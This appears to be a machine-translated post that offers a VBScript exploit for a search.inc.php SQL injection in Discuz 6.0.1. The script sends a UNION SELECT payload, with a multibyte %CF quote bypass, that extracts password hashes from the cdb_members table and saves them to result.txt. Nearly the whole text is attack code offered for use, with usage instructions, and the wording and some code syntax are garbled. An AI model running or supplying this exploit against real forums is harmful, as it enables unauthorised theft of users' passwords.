Also conducive to modification
The following is the search.inc.php file vulnerability exploit code VBS version
Copy Code code as follows:
Dim Strurl,strsite,strpath,struid
SHOWB ()
Set Args = wscript.arguments
If Args.count <> 3 Then
Showu ()
Else
Strsite=args (0)
Strpath=args (1)
Struid=args (2)
End If
Strurl= "ACTION=SEARCH&SEARCHID=22%CF ' UNION SELECT 1,password,3,password/**/from/**/cdb_members/**/where/**/ Uid= "& Struid &"/*&do=submit "
Set Objxml = CreateObject ("Microsoft.XMLHTTP")
Objxml.open "POST", Strsite & strpath & "index.php", False
Objxml.setrequestheader "Accept", "*/*"
Objxml.setrequestheader "Accept-language", "ZH-CN"
Objxml.setrequestheader "Content-type", "application/x-www-form-urlencoded"
Objxml.setrequestheader "User-agent", "WAP"
Objxml.send (strURL)
WScript.Echo (Objxml.responsetext)
Sub SHOWB ()
With Wscript
. Echo ("+--------------------------=====================------------------------------+")
. Echo ("Exploit discuz6.0.1")
. Echo ("Code by Safe3")
. Echo ("+--------------------------=====================------------------------------+")
End With
End Sub
Sub Showu ()
With Wscript
. Echo ("+--------------------------=====================------------------------------+")
. Echo ("Usage:")
. Echo ("cscript"). scriptname& "site path uid")
. Echo ("Example:")
. Echo ("cscript"). scriptname& "http://www.example.com//forum/1 >result.txt")
. Echo ("+--------------------------=====================------------------------------+")
. Quit
End With
End Sub
Get the password everyone find yourself in the Result.txt